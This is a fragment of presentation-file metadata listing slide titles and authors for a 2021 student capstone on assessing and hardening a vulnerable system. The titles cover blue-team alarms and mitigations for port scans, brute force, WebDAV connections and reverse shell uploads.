      <vt:lpstr>Analysis: Finding the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Blue Team Proposed Alarms and  Mitigation Strategies</vt:lpstr>
      <vt:lpstr>Mitigation: Blocking the Port Scan</vt:lpstr>
      <vt:lpstr>Mitigation: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Mitigation: Preventing Brute Force Attacks</vt:lpstr>
      <vt:lpstr>Mitigation: Detecting the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Mitigation: Identifying Reverse Shell Uploads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Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System Submitted by: Jack Lawton, Eric Troutman, Colin Clark, Leslie Kahler, Mekete Sugebo </dc:title>
  <cp:lastModifiedBy>Leslie Kahler</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-16T00:33:39Z</dcterms:modified>
</cp:coreProperties>
</file>